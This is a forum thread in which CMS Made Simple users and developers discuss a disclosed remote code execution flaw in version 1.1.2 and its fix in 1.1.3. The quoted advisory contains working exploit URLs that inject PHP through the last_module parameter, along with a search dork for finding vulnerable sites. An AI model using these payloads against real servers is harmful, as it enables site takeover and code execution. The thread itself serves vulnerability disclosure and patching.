CMSMS 1.1.2 Remote Code Execution Vulnerability

[johnbmcdonald]

FYI    I just ran across this..

http://www.milw0rm.com/exploits/4442


#                                      o      [bug]    /"*._        _        #
#                .                    .    .      .-*'`    `*-.._.-'/        #
#                                  o      o    < * ))    ,      (        #
#                            .          o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability            #
# author: irk4z@yahoo.pl                                                      #
# download:                                                                    #
#  http://dev.cmsmadesimple.org/frs/downlo ... 2.zip&nbsp; #
# dork: "powered by CMS Made Simple version 1.1.2"                            #
# greetz: cOndemned, kacper, str0ke                                            #

# code:

/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...

# exploit:

http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]

# milw0rm.com [2007-09-21]

[RonnyK]

John,

i posted your link in the DEV-channel, to be checked.

Just for curiosity, how did you get that link, did you search......

Ronny

[calguy1000]

I've committed some changes that should stop this bug from happening.

[bterkuile]

I tested this one and it only worked when register_globals was On

[calguy1000]

Yeah, but some environments put register_globals on for some of the older forum or cart packages, etc.

[johnbmcdonald]

Ronny,

John,

i posted your link in the DEV-channel, to be checked.

Just for curiosity, how did you get that link, did you search......

Ronny

When i started using this script a few months ago, I set up a google alert for "cms made simple vulnerability"
without the quotes.

http://www.google.com/alerts

John

[Signex]

I see version 1.1.3 is already released in the DEV.  A very fast reaction from dev team!!

[calguy1000]

CMS Made Simple 1.1.3 is out.  We've put checks into all of the adodb_lite scripts to ensure that it's being called from CMS Made Simple. This should ensure that this problem doesn't occur.

[johnbmcdonald]

Wow! Excellent response time!

Thanks!

John

[calguy1000]

You caught us on a good day.

Not that good, because the first patch was messed up, but still a reasonably good day.

[Pierre M.]

Well done Devs ! Thank you.

@all: Please notice : URL filtering prevents such attacks because the query string contains ],[,...
Of course, filtering or not, everybody should upgrade asap.

Pierre M.